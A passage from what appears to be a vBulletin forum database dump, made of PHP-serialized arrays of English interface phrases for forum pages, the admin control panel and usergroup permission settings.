Now\";s:6:\"voters\";s:6:\"Voters\";s:5:\"votes\";s:5:\"Votes\";s:9:\"wednesday\";s:9:\"Wednesday\";s:4:\"week\";s:4:\"Week\";s:25:\"weekly_email_notification\";s:25:\"Weekly email notification\";s:23:\"weekly_updates_by_email\";s:23:\"Weekly updates by email\";s:5:\"weeks\";s:5:\"Weeks\";s:30:\"welcome_to_our_newest_member_x\";s:53:\"Welcome to our newest member, %2$s\";s:16:\"welcome_to_the_x\";s:20:\"Welcome to the %1$s.\";s:9:\"welcome_x\";s:14:\"Welcome, %1$s.\";s:16:\"welcome_x_link_y\";s:33:\"Welcome, %1$s.\";s:14:\"whats_going_on\";s:16:\"What\'s Going On?\";s:10:\"who_posted\";s:11:\"Who Posted?\";s:11:\"whos_online\";s:12:\"Who\'s Online\";s:26:\"window_open_failed_blocker\";s:77:\"Unable to open a new browser window,\\n This might be due to a \'popup blocker\'\";s:22:\"within_the_last_x_days\";s:25:\"Within the Last %1$s Days\";s:13:\"x_attachments\";s:18:\"%1$s Attachment(s)\";s:10:\"x_days_ago\";s:13:\"%1$s Days Ago\";s:25:\"x_does_not_have_any_notes\";s:39:\"%1$s does not currently have any notes.\";s:11:\"x_downloads\";s:14:\"%1$s Downloads\";s:11:\"x_hours_ago\";s:14:\"%1$s Hours Ago\";s:14:\"x_is_invisible\";s:17:\"%1$s is invisible\";s:12:\"x_is_offline\";s:15:\"%1$s is offline\";s:24:\"x_is_on_your_ignore_list\";s:80:\"%1$s is on your ignore list.\";s:15:\"x_is_online_now\";s:18:\"%1$s is online now\";s:6:\"x_is_y\";s:12:\"%1$s is %2$s\";s:8:\"x_mailer\";s:4:\"%1$s\";s:22:\"x_members_and_y_guests\";s:28:\"%1$s members and %2$s guests\";s:13:\"x_minutes_ago\";s:16:\"%1$s Minutes Ago\";s:6:\"x_of_y\";s:12:\"%1$s of %2$s\";s:22:\"x_powered_by_vbulletin\";s:27:\"%1$s - Powered by vBulletin\";s:12:\"x_statistics\";s:15:\"%1$s Statistics\";s:9:\"x_viewing\";s:12:\"%1$s Viewing\";s:11:\"x_weeks_ago\";s:14:\"%1$s Weeks Ago\";s:12:\"x_y_requests\";s:20:\"%1$s (%2$s requests)\";s:4:\"year\";s:4:\"Year\";s:5:\"years\";s:5:\"Years\";s:3:\"yes\";s:3:\"Yes\";s:9:\"yesterday\";s:9:\"Yesterday\";s:33:\"you_are_subscribed_to_this_thread\";s:33:\"You are subscribed to this thread\";s:35:\"you_have_already_voted_on_this_poll\";s:35:\"You have already voted on this poll\";s:45:\"you_have_been_invited_to_the_following_groups\";s:45:\"You have been invited to the following groups\";s:23:\"you_may_edit_your_posts\";s:40:\"You may edit your posts\";s:27:\"you_may_not_edit_your_posts\";s:44:\"You may not edit your posts\";s:28:\"you_may_not_post_attachments\";s:45:\"You may not post attachments\";s:28:\"you_may_not_post_new_threads\";s:45:\"You may not post new threads\";s:24:\"you_may_not_post_replies\";s:41:\"You may not post replies\";s:29:\"you_may_not_vote_on_this_poll\";s:29:\"You may not vote on this poll\";s:36:\"you_may_only_attach_x_files_per_post\";s:45:\"You may only attach up to %1$s files per post\";s:24:\"you_may_post_attachments\";s:41:\"You may post attachments\";s:24:\"you_may_post_new_threads\";s:41:\"You may post new threads\";s:20:\"you_may_post_replies\";s:37:\"You may post replies\";s:12:\"your_folders\";s:12:\"Your Folders\";s:18:\"your_notifications\";s:18:\"Your Notifications\";s:21:\"your_pm_box_is_x_full\";s:27:\"Your PM box is %1$s%% full.\";s:12:\"your_profile\";s:12:\"Your Profile\";s:13:\"your_username\";s:13:\"Your Username\";}', 'a:183:{s:12:\"access_masks\";s:12:\"Access Masks\";s:6:\"active\";s:6:\"Active\";s:3:\"add\";s:3:\"Add\";s:14:\"add_new_notice\";s:14:\"Add New Notice\";s:16:\"add_new_rss_feed\";s:16:\"Add New RSS Feed\";s:31:\"add_new_social_bookmarking_site\";s:31:\"Add New Social Bookmarking Site\";s:21:\"additional_usergroups\";s:21:\"Additional Usergroups\";s:25:\"administrator_permissions\";s:25:\"Administrator Permissions\";s:11:\"all_default\";s:11:\"All Default\";s:6:\"all_no\";s:6:\"All No\";s:14:\"all_usergroups\";s:14:\"All Usergroups\";s:9:\"all_users\";s:9:\"All Users\";s:7:\"all_yes\";s:7:\"All Yes\";s:21:\"allow_privacy_options\";s:122:\"Allow User Privacy OptionsAllow users to hide the category in their profile from other users of their choosing.\";s:20:\"allow_user_selection\";s:20:\"Allow User Selection\";s:20:\"announcement_manager\";s:20:\"Announcement Manager\";s:42:\"are_you_sure_want_to_delete_announcement_x\";s:166:\"Are you sure you want to delete the announcement called \'%1$s\'?
(%2$s: %3$s)

%4$s This action cannot be undone.\";s:42:\"are_you_sure_want_to_delete_bookmarksite_x\";s:177:\"Are you sure you want to delete the social bookmarking site called \'%1$s\'?
(%2$s: %3$s)

%4$s This action cannot be undone.\";s:9:\"ascending\";s:9:\"Ascending\";s:7:\"avatars\";s:7:\"Avatars\";s:12:\"banned_users\";s:12:\"Banned Users\";s:9:\"check_all\";s:9:\"Check All\";s:10:\"child_of_x\";s:13:\"Child of %1$s\";s:31:\"click_for_help_on_these_options\";s:31:\"Click for help on these options\";s:29:\"click_for_help_on_this_option\";s:29:\"Click for help on this option\";s:33:\"click_here_to_continue_processing\";s:37:\"Click here to continue processing ...\";s:5:\"close\";s:5:\"Close\";s:9:\"color_key\";s:9:\"Color Key\";s:9:\"completed\";s:9:\"Completed\";s:16:\"confirm_deletion\";s:16:\"Confirm Deletion\";s:18:\"confirm_deletion_x\";s:50:\"Confirm Deletion: %1$s\";s:8:\"continue\";s:8:\"Continue\";s:17:\"control_panel_log\";s:17:\"Control Panel Log\";s:8:\"controls\";s:8:\"Controls\";s:7:\"creator\";s:7:\"Creator\";s:54:\"customized_using_custom_permissions_for_this_usergroup\";s:62:\"Customized: Using custom permissions for this usergroup\";s:20:\"data_validation_type\";s:20:\"Data Validation Type\";s:15:\"database_backup\";s:15:\"Database Backup\";s:16:\"default_view_age\";s:69:\"Default View Age (Default date cut-off for thread display)\";s:10:\"delete_all\";s:10:\"Delete All\";s:16:\"delete_moderator\";s:16:\"Delete Moderator\";s:20:\"delete_this_category\";s:20:\"Delete this Category\";s:10:\"descending\";s:10:\"Descending\";s:11:\"description\";s:11:\"Description\";s:17:\"developer_options\";s:17:\"Developer Options\";s:11:\"diagnostics\";s:11:\"Diagnostics\";s:7:\"disable\";s:7:\"Disable\";s:13:\"display_order\";s:13:\"Display Order\";s:8:\"download\";s:8:\"Download\";s:9:\"edit_text\";s:9:\"Edit Text\";s:6:\"either\";s:6:\"Either\";s:6:\"enable\";s:6:\"Enable\";s:23:\"enable_disable_features\";s:25:\"Enable / Disable Features\";s:7:\"enabled\";s:7:\"Enabled\";s:5:\"error\";s:5:\"Error\";s:11:\"exact_match\";s:11:\"Exact Match\";s:17:\"execute_sql_query\";s:17:\"Execute SQL Query\";s:10:\"expand_all\";s:10:\"Expand All\";s:14:\"field_required\";s:14:\"Field Required\";s:8:\"filename\";s:8:\"Filename\";s:4:\"find\";s:4:\"Find\";s:32:\"find_all_threads_older_than_days\";s:34:\"Find All Threads Older Than X Days\";s:18:\"forum_and_children\";s:47:\"Forum (Also applies to child forums)\";s:21:\"generate_mailing_list\";s:21:\"Generate Mailing List\";s:20:\"global_announcements\";s:20:\"Global Announcements\";s:4:\"help\";s:4:\"Help\";s:54:\"here_you_may_edit_forum_access_on_a_user_by_user_basis\";s:561:\"Here you may edit forum access on a user-by-user basis.

Selecting \"Yes\" will allow the user access to the forum. Selecting \"No\" will deny the user access to the forum. Any changes made to one user\'s account will override the default permission settings in their usergroup.

Selecting \"Default\" will revert the user to the default permissions settings for their usergroup.

(Please note that the permission inheritance system still works here.)

(Ensure that you have access masks enabled before attempting to use these!)\";s:9:\"home_page\";s:9:\"Home Page\";s:9:\"host_name\";s:9:\"Host Name\";s:4:\"hour\";s:4:\"Hour\";s:17:\"html_content_type\";s:17:\"HTML Content Type\";s:4:\"icon\";s:4:\"Icon\";s:22:\"icon_bookmarksite_help\";s:91:\"Filename for Icon. This must be placed in your misc image directory (default: images/misc).\";s:52:\"if_you_are_not_automatically_redirected_click_here_x\";s:78:\"If you are not automatically redirected, please click here.\";s:27:\"if_you_change_display_order\";s:131:\"If you change the display orders, please be sure to submit the form using the \'Save Display Order\' button at the bottom of the page\";s:5:\"image\";s:5:\"Image\";s:6:\"import\";s:6:\"Import\";s:15:\"import_xml_file\";s:46:\"OR import the XML file from your server\";s:24:\"invalid_action_specified\";s:24:\"Invalid Action Specified\";s:23:\"invalid_forum_parenting\";s:57:\"Invalid forum parenting setup. Contact vBulletin support.\";s:8:\"language\";s:8:\"Language\";s:14:\"large_edit_box\";s:14:\"Large Edit Box\";s:4:\"link\";s:4:\"Link\";s:31:\"link_replacement_variables_help\";s:84:\"Replacement variables: {URL} is the given page url, {TITLE} is the given page title.\";s:35:\"logged_in_user_x_executed_y_queries\";s:44:\"Logged-in user: %1$s; Executed %2$s queries.\";s:4:\"logs\";s:4:\"Logs\";s:11:\"maintenance\";s:11:\"Maintenance\";s:9:\"mass_move\";s:9:\"Mass Move\";s:32:\"max_length_of_allowed_user_input\";s:32:\"Max length of allowed user input\";s:15:\"maximum_chars_x\";s:19:\"Maximum Chars: %1$s\";s:13:\"minimum_posts\";s:13:\"Minimum Posts\";s:6:\"minute\";s:6:\"Minute\";s:10:\"moderation\";s:10:\"Moderation\";s:13:\"moderator_log\";s:13:\"Moderator Log\";s:18:\"moderator_username\";s:18:\"Moderator Username\";s:19:\"moderator_usernames\";s:19:\"Moderator Usernames\";s:6:\"modify\";s:6:\"Modify\";s:4:\"move\";s:4:\"Move\";s:40:\"no_file_uploaded_and_no_local_file_found\";s:46:\"No file uploaded and no local file found. %1$s\";s:6:\"no_one\";s:6:\"No one\";s:10:\"no_posting\";s:10:\"No Posting\";s:15:\"notices_manager\";s:15:\"Notices Manager\";s:8:\"order_by\";s:8:\"Order By\";s:13:\"order_by_date\";s:13:\"Order By Date\";s:17:\"order_by_username\";s:18:\"Order By User Name\";s:4:\"page\";s:4:\"Page\";s:12:\"parent_forum\";s:12:\"Parent Forum\";s:12:\"parent_style\";s:12:\"Parent Style\";s:9:\"permanent\";s:9:\"Permanent\";s:11:\"phrase_type\";s:11:\"Phrase Type\";s:7:\"phrases\";s:7:\"Phrases\";s:11:\"please_wait\";s:14:\"Please Wait...\";s:17:\"primary_usergroup\";s:17:\"Primary Usergroup\";s:27:\"processing_complete_proceed\";s:29:\"Processing Complete - Proceed\";s:12:\"processing_x\";s:16:\"Processing: %1$s\";s:7:\"product\";s:7:\"Product\";s:10:\"promotions\";s:10:\"Promotions\";s:5:\"prune\";s:5:\"Prune\";s:23:\"prune_post_edit_history\";s:23:\"Prune Post Edit History\";s:8:\"question\";s:8:\"Question\";s:12:\"quick_search\";s:12:\"Quick Search\";s:25:\"rebuild_style_information\";s:25:\"Rebuild Style Information\";s:8:\"reminder\";s:8:\"Reminder\";s:14:\"repeat_process\";s:14:\"Repeat Process\";s:17:\"replace_with_text\";s:17:\"Replace with Text\";s:16:\"reputation_level\";s:16:\"Reputation Level\";s:7:\"restart\";s:7:\"Restart\";s:7:\"results\";s:7:\"Results\";s:6:\"revert\";s:6:\"Revert\";s:16:\"rss_feed_manager\";s:16:\"RSS Feed Manager\";s:18:\"save_display_order\";s:18:\"Save Display Order\";s:19:\"save_enabled_status\";s:19:\"Save Enabled Status\";s:30:\"save_open_groups_automatically\";s:30:\"Save open groups automatically\";s:10:\"save_prefs\";s:10:\"Save Prefs\";s:18:\"scheduled_task_log\";s:18:\"Scheduled Task Log\";s:6:\"script\";s:6:\"Script\";s:15:\"search_for_text\";s:15:\"Search for Text\";s:11:\"search_in_x\";s:14:\"Search in %1$s\";s:11:\"search_type\";s:11:\"Search Type\";s:12:\"select_forum\";s:12:\"Select Forum\";s:28:\"separate_usernames_semicolon\";s:38:\"Separate multiple usernames with a \';\'\";s:11:\"set_default\";s:11:\"Set Default\";s:13:\"setting_group\";s:13:\"Setting Group\";s:16:\"settings_to_edit\";s:107:\"Settings to Edit Select the settings type you want to edit and click the \"Edit Settings\" button.\";s:26:\"social_bookmarking_manager\";s:26:\"Social Bookmarking Manager\";s:44:\"standard_using_default_usergroup_permissions\";s:52:\"Standard: Using default usergroup permissions\";s:10:\"statistics\";s:10:\"Statistics\";s:6:\"status\";s:6:\"Status\";s:5:\"style\";s:5:\"Style\";s:6:\"styles\";s:6:\"Styles\";s:8:\"stylevar\";s:8:\"Stylevar\";s:9:\"stylevars\";s:9:\"StyleVars\";s:5:\"table\";s:5:\"Table\";s:9:\"templates\";s:9:\"Templates\";s:4:\"text\";s:4:\"Text\";s:9:\"thumbnail\";s:9:\"Thumbnail\";s:23:\"to_continue_this_action\";s:81:\"To continue this action, login using the admin account that initiated the action.\";s:28:\"toggle_active_status_for_all\";s:28:\"Toggle Active Status for All\";s:12:\"translations\";s:12:\"Translations\";s:13:\"unknown_error\";s:13:\"Unknown Error\";s:6:\"update\";s:6:\"Update\";s:16:\"updated_x_styles\";s:21:\"Updated %1$s style(s)\";s:15:\"upload_xml_file\";s:52:\"EITHER upload the XML file from your computer\";s:18:\"user_profile_field\";s:18:\"User Profile Field\";s:19:\"user_profile_fields\";s:19:\"User Profile Fields\";s:9:\"user_rank\";s:9:\"User Rank\";s:17:\"usergroup_options\";s:17:\"Usergroup Options\";s:5:\"users\";s:5:\"Users\";s:16:\"utf8encode_title\";s:19:\"UTF8 Encode {TITLE}\";s:21:\"utf8encode_title_help\";s:90:\"Some sites (such as twitter.com) require URL to be encoded. Set \"Yes\" if this is required.\";s:7:\"varname\";s:7:\"Varname\";s:17:\"vbulletin_default\";s:66:\"vBulletin Default (Will be replaced by upgrade scripts)\";s:17:\"vbulletin_options\";s:17:\"vBulletin Options\";s:24:\"view_reputation_comments\";s:24:\"View Reputation Comments\";s:9:\"who_voted\";s:9:\"Who Voted\";s:49:\"x_enter_the_options_that_the_user_can_choose_from\";s:120:\"%1$sEnter the options that the user can choose from. Separate each option with a new-line (carriage return).\";s:21:\"x_from_the_calendar_y\";s:41:\"%1$s from the calendar %2$s\";s:18:\"x_from_the_forum_y\";s:38:\"%1$s from the forum %2$s\";s:6:\"x_to_y\";s:12:\"%1$s to %2$s\";s:13:\"x_translation\";s:16:\"%1$s Translation\";s:8:\"x_y_id_z\";s:49:\"%1$s: %2$s (id: %3$s)\";s:36:\"you_did_not_specify_a_file_to_upload\";s:141:\"You did not specify a file to upload, so vBulletin will attempt to import the file\\n\\n%1$s\\n\\nfrom the server\'s file system.\\n\\nAre you sure?\";s:22:\"zero_equals_no_display\";s:35:\"Set to \'0\' to not display this item\";}', 'a:283:{s:20:\"additional_functions\";s:20:\"Additional Functions\";s:13:\"administrator\";s:13:\"Administrator\";s:33:\"administrator_permissions_manager\";s:33:\"Administrator Permissions Manager\";s:18:\"album_max_pictures\";s:32:\"Maximum Number of Album Pictures\";s:14:\"album_max_size\";s:78:\"Maximum Total File Size of Album Pictures (bytes)\r\n1KB = 1024 bytes\";s:24:\"album_picture_max_height\";s:37:\"Album Picture Maximum Height (pixels)\";s:22:\"album_picture_max_size\";s:68:\"Album Picture Maximum File Size (bytes)\r\n1KB = 1024 bytes\";s:23:\"album_picture_max_width\";s:36:\"Album Picture Maximum Width (pixels)\";s:18:\"allow_bbcode_align\";s:77:\"Allow Alignment BB Code\";s:18:\"allow_bbcode_basic\";s:52:\"Allow Basic BB Code\";s:17:\"allow_bbcode_code\";s:46:\"Allow Code BB Code\";s:18:\"allow_bbcode_color\";s:48:\"Allow Color BB Code\";s:19:\"allow_bbcode_custom\";s:73:\"Allow Custom BB Codes\";s:17:\"allow_bbcode_font\";s:46:\"Allow Font BB Code\";s:17:\"allow_bbcode_html\";s:46:\"Allow HTML BB Code\";s:16:\"allow_bbcode_img\";s:46:\"Allow Image BB Code\";s:17:\"allow_bbcode_link\";s:69:\"Allow Link BB Code\";s:17:\"allow_bbcode_list\";s:46:\"Allow List BB Code\";s:16:\"allow_bbcode_php\";s:44:\"Allow PHP BB Code\";s:18:\"allow_bbcode_quote\";s:48:\"Allow Quote BB Code\";s:17:\"allow_bbcode_size\";s:46:\"Allow Size BB Code\";s:19:\"allow_member_groups\";s:157:\"Allow Users to have Member Groups (Sets whether or not permissions from the user\'s member (secondary) user group memberships are inherited or not)\";s:26:\"apply_permissions_to_forum\";s:59:\"Apply Permissions to Forum (Includes Sub-Forums)\";s:30:\"apply_permissions_to_usergroup\";s:31:\"Apply Permissions to Usergroups\";s:22:\"attachment_permissions\";s:22:\"Attachment Permissions\";s:18:\"birthdays_viewable\";s:139:\"Birthdays Viewable (Sets whether or not the birthdays of users in this group are displayed on the calendar and forum home pages)\";s:20:\"calendar_permissions\";s:20:\"Calendar Permissions\";s:28:\"calendar_permissions_manager\";s:28:\"Calendar Permissions Manager\";s:24:\"can_access_control_panel\";s:43:\"Can Access Control Panel (is Administrator)\";s:22:\"can_administer_bbcodes\";s:23:\"Can Administer BB Codes\";s:24:\"can_administer_calendars\";s:24:\"Can Administer Calendars\";s:19:\"can_administer_cron\";s:19:\"Can Administer CRON\";s:18:\"can_administer_faq\";s:19:\"Can Administer FAQs\";s:21:\"can_administer_forums\";s:21:\"Can Administer Forums\";s:21:\"can_administer_images\";s:40:\"Can Administer Avatars / Icons / Smilies\";s:24:\"can_administer_languages\";s:24:\"Can Administer Languages\";s:28:\"can_administer_moderator_log\";s:28:\"Can Administer Moderator Log\";s:22:\"can_administer_notices\";s:22:\"Can Administer Notices\";s:22:\"can_administer_plugins\";s:22:\"Can Administer Plugins\";s:23:\"can_administer_settings\";s:23:\"Can Administer Settings\";s:21:\"can_administer_styles\";s:21:\"Can Administer Styles\";s:22:\"can_administer_threads\";s:22:\"Can Administer Threads\";s:31:\"can_administer_user_permissions\";s:31:\"Can Administer User Permissions\";s:20:\"can_administer_users\";s:20:\"Can Administer Users\";s:28:\"can_always_create_discussion\";s:120:\"Can Always Create Discussions\r\nIf enabled, the user will also be able to view private and invite only groups.\";s:23:\"can_always_post_message\";s:115:\"Can Always Post Messages\r\nIf enabled, the user will also be able to view private and invite only groups.\";s:13:\"can_ban_users\";s:13:\"Can Ban Users\";s:20:\"can_comment_pictures\";s:23:\"Can Comment on Pictures\";s:21:\"can_create_discussion\";s:36:\"Can Create New Discussions in Groups\";s:24:\"can_create_social_groups\";s:24:\"Can Create Social Groups\";s:15:\"can_create_tags\";s:15:\"Can Create Tags\";s:22:\"can_delete_discussions\";s:22:\"Can Delete Discussions\";s:17:\"can_delete_events\";s:17:\"Can Delete Events\";s:21:\"can_delete_own_events\";s:21:\"Can Delete Own Events\";s:31:\"can_delete_own_picture_comments\";s:31:\"Can Delete Own Picture Comments\";s:20:\"can_delete_own_posts\";s:20:\"Can Delete Own Posts\";s:28:\"can_delete_own_social_groups\";s:28:\"Can Delete Own Social Groups\";s:22:\"can_delete_own_threads\";s:22:\"Can Delete Own Threads\";s:31:\"can_delete_own_visitor_messages\";s:31:\"Can Delete Own Visitor Messages\";s:27:\"can_delete_picture_comments\";s:27:\"Can Delete Picture Comments\";s:16:\"can_delete_posts\";s:16:\"Can Delete Posts\";s:24:\"can_delete_social_groups\";s:24:\"Can Delete Social Groups\";s:27:\"can_delete_tags_own_threads\";s:30:\"Can Delete Tags on Own Threads\";s:19:\"can_deny_pm_receipt\";s:45:\"Can Deny Private Message Read Receipt Request\";s:24:\"can_download_attachments\";s:24:\"Can Download Attachments\";s:25:\"can_edit_background_image\";s:85:\"Can Edit Background Images\r\nUsers must have user album permissions as well\";s:16:\"can_edit_borders\";s:66:\"Can Edit Borders\r\nCovers border style, color, and width\";s:15:\"can_edit_colors\";s:61:\"Can Edit Colors\r\nCovers font and background colors\";s:20:\"can_edit_discussions\";s:20:\"Can Edit Discussions\";s:15:\"can_edit_events\";s:15:\"Can Edit Events\";s:20:\"can_edit_font_family\";s:20:\"Can Edit Font Family\";s:18:\"can_edit_font_size\";s:18:\"Can Edit Font Size\";s:19:\"can_edit_own_events\";s:19:\"Can Edit Own Events\";s:29:\"can_edit_own_picture_comments\";s:29:\"Can Edit Own Picture Comments\";s:18:\"can_edit_own_posts\";s:18:\"Can Edit Own Posts\";s:20:\"can_edit_own_profile\";s:20:\"Can Edit Own Profile\";s:26:\"can_edit_own_social_groups\";s:157:\"Can Edit Own Social Groups\r\nIf the only member of the group is the owner, he/she will be able to edit the group\'s info regardless of this setting.\";s:23:\"can_edit_own_user_notes\";s:156:\"Can Manage Own User NotesNotes that this user has posted, for self or others. This will override the above manage permissions, if enabled.\";s:29:\"can_edit_own_visitor_messages\";s:29:\"Can Edit Own Visitor Messages\";s:25:\"can_edit_picture_comments\";s:25:\"Can Edit Picture Comments\";s:14:\"can_edit_polls\";s:14:\"Can Edit Polls\";s:14:\"can_edit_posts\";s:14:\"Can Edit Posts\";s:16:\"can_edit_privacy\";s:106:\"Can Edit Profile PrivacyWhether the user can hide blocks on their profile page from other users\";s:22:\"can_edit_social_groups\";s:22:\"Can Edit Social Groups\";s:16:\"can_edit_threads\";s:16:\"Can Edit Threads\";s:21:\"can_edit_user_avatars\";s:21:\"Can Edit User Avatars\";s:30:\"can_edit_user_profile_pictures\";s:30:\"Can Edit User Profile Pictures\";s:33:\"can_edit_user_reputation_comments\";s:33:\"Can Edit User Reputation Comments\";s:24:\"can_edit_user_signatures\";s:24:\"Can Edit User Signatures\";s:17:\"can_email_members\";s:17:\"Can Email Members\";s:30:\"can_give_arbitrary_infractions\";s:36:\"Can Give Arbitrary Value Infractions\";s:20:\"can_give_infractions\";s:30:\"Can Give Infractions to Others\";s:14:\"can_have_album\";s:34:\"Can Have Album and Upload Pictures\";s:19:\"can_hide_reputation\";s:31:\"Can Hide Reputation from Others\";s:16:\"can_ignore_quota\";s:70:\"Can send PMs to users who have reached their quota and/or disabled PMs\";s:22:\"can_join_social_groups\";s:22:\"Can Join Social Groups\";s:29:\"can_leave_negative_reputation\";s:29:\"Can Leave Negative Reputation\";s:20:\"can_limit_discussion\";s:165:\"Can Limit Discussions in Own Groups to the Group OwnerIf enabled, the user can configure their social groups so that only they can create new discussions.\";s:32:\"can_manage_comments_own_pictures\";s:35:\"Can Manage Comments on Own Pictures\";s:28:\"can_manage_group_discussions\";s:26:\"Can Manage Own Discussions\";s:25:\"can_manage_group_messages\";s:23:\"Can Manage Own Messages\";s:28:\"can_manage_others_user_notes\";s:34:\"Can Manage User Notes About Others\";s:28:\"can_manage_own_social_groups\";s:28:\"Can Manage Own Social Groups\";s:25:\"can_manage_own_user_notes\";s:32:\"Can Manage User Notes About Self\";s:31:\"can_manage_own_visitor_messages\";s:38:\"Can Manage Messages within Own Profile\";s:18:\"can_manage_threads\";s:18:\"Can Manage Threads\";s:21:\"can_mass_move_threads\";s:21:\"Can Mass-Move Threads\";s:22:\"can_mass_prune_threads\";s:22:\"Can Mass-Prune Threads\";s:24:\"can_moderate_attachments\";s:24:\"Can Moderate Attachments\";s:24:\"can_moderate_discussions\";s:24:\"Can Moderate Discussions\";s:19:\"can_moderate_events\";s:19:\"Can Moderate Events\";s:29:\"can_moderate_picture_comments\";s:29:\"Can Moderate Picture Comments\";s:21:\"can_moderate_pictures\";s:21:\"Can Moderate Pictures\";s:18:\"can_moderate_posts\";s:18:\"Can Moderate Posts\";s:15:\"can_move_events\";s:15:\"Can Move Events\";s:20:\"can_move_own_threads\";s:20:\"Can Move Own Threads\";s:26:\"can_open_close_own_threads\";s:28:\"Can Open / Close Own Threads\";s:22:\"can_open_close_threads\";s:24:\"Can Open / Close Threads\";s:32:\"can_override_primary_group_title\";s:39:\"Can override primary group title/markup\";s:33:\"can_physically_delete_discussions\";s:120:\"Can Physically Delete Discussions (Completely removes the discussion and all of it\'s posts from the database)\";s:27:\"can_physically_delete_posts\";s:86:\"Can Physically Delete Posts (Completely removes the post from the database)\";s:22:\"can_post_announcements\";s:129:\"Can Post Announcements\r\nGranting this permission will allow this user to post announcements containing arbitrary HTML.\";s:20:\"can_post_attachments\";s:20:\"Can Post Attachments\";s:15:\"can_post_events\";s:15:\"Can Post Events\";s:22:\"can_post_group_message\";s:27:\"Can Post Messages in Groups\";s:14:\"can_post_polls\";s:14:\"Can Post Polls\";s:16:\"can_post_threads\";s:16:\"Can Post Threads\";s:32:\"can_post_user_notes_about_others\";s:32:\"Can Post User Notes About Others\";s:30:\"can_post_user_notes_about_self\";s:30:\"Can Post User Notes About Self\";s:43:\"can_post_visitor_messages_to_others_profile\";s:44:\"Can Post Visitor Messages to Others\' Profile\";s:40:\"can_post_visitor_messages_to_own_profile\";s:40:\"Can Post Visitor Messages to Own Profile\";s:16:\"can_rate_threads\";s:16:\"Can Rate Threads\";s:27:\"can_remove_picture_comments\";s:101:\"Can Physically Delete Picture Comments\r\n(Completely removes the comment from the database)\";s:27:\"can_reply_to_others_threads\";s:28:\"Can Reply to Others\' Threads\";s:24:\"can_reply_to_own_threads\";s:24:\"Can Reply to Own Threads\";s:24:\"can_restore_banned_users\";s:24:\"Can Restore Banned Users\";s:23:\"can_reverse_infractions\";s:23:\"Can Reverse Infractions\";s:19:\"can_run_maintenance\";s:25:\"Can Run Maintenance Tools\";s:16:\"can_search_forum\";s:16:\"Can Search Forum\";s:17:\"can_search_forums\";s:17:\"Can Search Forums\";s:24:\"can_see_deletion_notices\";s:24:\"Can See Deletion Notices\";s:23:\"can_see_invisible_users\";s:60:\"Can \'See\' Users Who Have Chosen to be Invisible While Online\";s:31:\"can_see_others_infraction_level\";s:32:\"Can See Others\' Infraction Level\";s:27:\"can_see_rep_left_for_others\";s:34:\"Can See Reputation Left for Others\";s:18:\"can_see_thumbnails\";s:18:\"Can See Thumbnails\";s:29:\"can_see_who_left_user_ratings\";s:29:\"Can See Who Left User Ratings\";s:22:\"can_set_forum_password\";s:22:\"Can Set Forum Password\";s:22:\"can_set_self_invisible\";s:30:\"Can Set Self to Invisible Mode\";s:22:\"can_tag_others_threads\";s:23:\"Can Tag Others\' Threads\";s:19:\"can_tag_own_threads\";s:19:\"Can Tag Own Threads\";s:26:\"can_transfer_social_groups\";s:26:\"Can Transfer Social Groups\";s:26:\"can_upload_ani_gif_sig_img\";s:37:\"Can Upload Animated GIF for Signature\";s:26:\"can_upload_animated_avatar\";s:26:\"Can Upload Animated Avatar\";s:30:\"can_upload_animated_group_icon\";s:31:\"Can Upload Animated Group Icons\";s:35:\"can_upload_animated_profile_picture\";s:35:\"Can Upload Animated Profile Picture\";s:22:\"can_upload_attachments\";s:22:\"Can Upload Attachments\";s:25:\"can_upload_custom_avatars\";s:25:\"Can Upload Custom Avatars\";s:27:\"can_upload_profile_pictures\";s:27:\"Can Upload Profile Pictures\";s:18:\"can_upload_sig_img\";s:31:\"Can Upload Images for Signature\";s:28:\"can_upload_social_group_icon\";s:29:\"Can Upload Social Group Icons\";s:22:\"can_use_boolean_search\";s:80:\"Can Use Boolean Search(Only applies if Fulltext searching is enabled)\";s:20:\"can_use_custom_title\";s:20:\"Can Use Custom Title\";s:23:\"can_use_email_to_friend\";s:23:\"Can Use Email to Friend\";s:15:\"can_use_friends\";s:20:\"Can Use Friends List\";s:24:\"can_use_message_tracking\";s:24:\"Can Use Message Tracking\";s:18:\"can_use_reputation\";s:18:\"Can Use Reputation\";s:18:\"can_use_signatures\";s:18:\"Can Use Signatures\";s:15:\"can_view_albums\";s:147:\"Can View Albums\r\nUsers without this permission will still be able to see picture in public and profile album if they know the exact URL.\";s:20:\"can_view_attachments\";s:20:\"Can View Attachments\";s:17:\"can_view_calendar\";s:17:\"Can View Calendar\";s:14:\"can_view_forum\";s:14:\"Can View Forum\";s:29:\"can_view_hidden_custom_fields\";s:30:\"Can View Private Custom Fields\";s:21:\"can_view_ip_addresses\";s:21:\"Can View IP Addresses\";s:20:\"can_view_member_info\";s:20:\"Can View Member Info\";s:22:\"can_view_others_events\";s:23:\"Can View Others\' Events\";s:32:\"can_view_others_profile_pictures\";s:33:\"Can View Others\' Profile Pictures\";s:23:\"can_view_others_threads\";s:24:\"Can View Others\' Threads\";s:26:\"can_view_others_user_notes\";s:32:\"Can View User Notes About Others\";s:23:\"can_view_own_user_notes\";s:30:\"Can View User Notes About Self\";s:22:\"can_view_social_groups\";s:22:\"Can View Social Groups\";s:16:\"can_view_threads\";s:23:\"Can View Thread Content\";s:22:\"can_view_whole_profile\";s:42:\"Can View Whole User Profile (but not edit)\";s:20:\"can_view_whos_online\";s:21:\"Can View Who\'s Online\";s:28:\"can_view_wol_actual_location\";s:48:\"Can view actual location of user (filepath/url).\";s:25:\"can_view_wol_bad_location\";s:80:\"Can View Detailed Location Info of Users Who Visit Bad / No Permission Locations\";s:28:\"can_view_wol_detail_location\";s:41:\"Can View Detailed Location Info for Users\";s:17:\"can_vote_on_polls\";s:17:\"Can Vote on Polls\";s:26:\"control_panel_style_choice\";s:26:\"Control Panel Style Choice\";s:27:\"copy_permissions_from_forum\";s:75:\"Copy Permissions from Forum (Does not include sub-forums)\";s:27:\"copy_permissions_from_group\";s:32:\"Copy Permissions from User Group\";s:26:\"copy_permissions_to_forums\";s:26:\"Copy Permissions to Forums\";s:26:\"copy_permissions_to_groups\";s:31:\"Copy Permissions to User Groups\";s:26:\"custom_avatar_max_filesize\";s:66:\"Custom Avatar Maximum File Size (bytes)1KB = 1024 bytes\";s:24:\"custom_avatar_max_height\";s:37:\"Custom Avatar Maximum Height (pixels)\";s:23:\"custom_avatar_max_width\";s:36:\"Custom Avatar Maximum Width (pixels)\";s:27:\"custom_calendar_permissions\";s:27:\"Custom Calendar Permissions\";s:54:\"customized_using_custom_permissions_for_this_usergroup\";s:62:\"Customized: Using custom permissions for this 